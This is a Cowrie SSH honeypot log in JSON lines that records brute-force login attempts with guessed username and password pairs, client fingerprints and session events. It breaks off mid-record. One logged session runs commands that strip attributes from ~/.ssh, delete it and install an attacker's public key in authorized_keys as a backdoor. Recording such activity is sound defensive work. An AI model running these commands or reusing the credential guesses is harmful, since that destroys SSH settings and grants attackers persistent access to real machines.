{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.719244Z","src_ip":"157.20.207.165","session":"542172d0d177"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39718,"dst_ip":"1.2.3.4","dst_port":22,"session":"42228a4598e2","protocol":"ssh","message":"New connection: 212.227.235.229:39718 (1.2.3.4:22) [session: 42228a4598e2]","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.735686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.741175Z","src_ip":"212.227.235.229","session":"42228a4598e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:27:26.902479Z","src_ip":"157.20.207.165","session":"542172d0d177"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:27.145392Z","src_ip":"212.227.235.229","session":"42228a4598e2"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password1","message":"login attempt [samsung/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:27.638512Z","src_ip":"157.20.207.165","session":"542172d0d177"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:28.824053Z","src_ip":"157.20.207.165","session":"542172d0d177"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:27:30.052607Z","src_ip":"212.227.235.229","session":"42228a4598e2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:30.476735Z","src_ip":"212.227.235.229","session":"42228a4598e2"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:30.479040Z","src_ip":"212.227.235.229","session":"bcaa235b410e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52120,"dst_ip":"1.2.3.4","dst_port":22,"session":"98e8d93cb125","protocol":"ssh","message":"New connection: 212.227.235.229:52120 (1.2.3.4:22) [session: 98e8d93cb125]","sensor":"my-vps","timestamp":"2025-09-09T06:27:33.646462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:33.647348Z","src_ip":"212.227.235.229","session":"98e8d93cb125"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:33.889166Z","src_ip":"212.227.235.229","session":"98e8d93cb125"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"monitor123","message":"login attempt [monitor/monitor123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:34.896383Z","src_ip":"212.227.235.229","session":"98e8d93cb125"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47955,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9b020a5c0d","protocol":"ssh","message":"New connection: 212.227.235.229:47955 (1.2.3.4:22) [session: 9e9b020a5c0d]","sensor":"my-vps","timestamp":"2025-09-09T06:27:35.681352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:27:35.682334Z","src_ip":"212.227.235.229","session":"9e9b020a5c0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:27:35.779278Z","src_ip":"212.227.235.229","session":"9e9b020a5c0d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:36.139804Z","src_ip":"212.227.235.229","session":"98e8d93cb125"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"raspberry2025","message":"login attempt [raspberry/raspberry2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:36.211023Z","src_ip":"212.227.235.229","session":"9e9b020a5c0d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:37.312811Z","src_ip":"212.227.235.229","session":"9e9b020a5c0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"774095e46a95","protocol":"ssh","message":"New connection: 212.227.235.229:42786 (1.2.3.4:22) [session: 774095e46a95]","sensor":"my-vps","timestamp":"2025-09-09T06:27:41.818734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:41.819800Z","src_ip":"212.227.235.229","session":"774095e46a95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37636,"dst_ip":"1.2.3.4","dst_port":22,"session":"10b8d34c09f9","protocol":"ssh","message":"New connection: 212.227.235.229:37636 (1.2.3.4:22) [session: 10b8d34c09f9]","sensor":"my-vps","timestamp":"2025-09-09T06:27:42.011254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:42.019741Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:42.185090Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:42.200892Z","src_ip":"212.227.235.229","session":"774095e46a95"}
{"eventid":"cowrie.login.success","username":"root","password":"qingfeng","message":"login attempt [root/qingfeng] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:27:42.860195Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:27:43.221083Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:27:43.221779Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:27:43.223324Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:43.608420Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:43.659548Z","src_ip":"212.227.235.229","session":"774095e46a95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:27:43.833548Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:27:43.834252Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:27:44.002140Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:44.003531Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38382,"dst_ip":"1.2.3.4","dst_port":22,"session":"9485c02f45f9","protocol":"ssh","message":"New connection: 212.227.235.229:38382 (1.2.3.4:22) [session: 9485c02f45f9]","sensor":"my-vps","timestamp":"2025-09-09T06:27:44.179287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:44.180599Z","src_ip":"212.227.235.229","session":"9485c02f45f9"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:44.361837Z","src_ip":"212.227.235.229","session":"9485c02f45f9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:27:45.068786Z","src_ip":"212.227.235.229","session":"9485c02f45f9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:45.170482Z","src_ip":"212.227.235.229","session":"774095e46a95"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:46.248867Z","src_ip":"212.227.235.229","session":"9485c02f45f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39056,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df7bf6905bc","protocol":"ssh","message":"New connection: 212.227.235.229:39056 (1.2.3.4:22) [session: 8df7bf6905bc]","sensor":"my-vps","timestamp":"2025-09-09T06:27:46.431714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:27:46.437740Z","src_ip":"212.227.235.229","session":"8df7bf6905bc"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:27:46.618758Z","src_ip":"212.227.235.229","session":"8df7bf6905bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:27:47.346800Z","src_ip":"212.227.235.229","session":"8df7bf6905bc"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:47.518909Z","src_ip":"212.227.235.229","session":"10b8d34c09f9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:47.527125Z","src_ip":"212.227.235.229","session":"8df7bf6905bc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56254,"dst_ip":"1.2.3.4","dst_port":22,"session":"411a0583c72a","protocol":"ssh","message":"New connection: 217.72.205.35:56254 (1.2.3.4:22) [session: 411a0583c72a]","sensor":"my-vps","timestamp":"2025-09-09T06:27:58.856652Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:27:58.857722Z","src_ip":"217.72.205.35","session":"411a0583c72a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54389,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4cf82cfa7fb","protocol":"ssh","message":"New connection: 212.227.235.229:54389 (1.2.3.4:22) [session: f4cf82cfa7fb]","sensor":"my-vps","timestamp":"2025-09-09T06:28:04.569991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:28:04.574496Z","src_ip":"212.227.235.229","session":"f4cf82cfa7fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["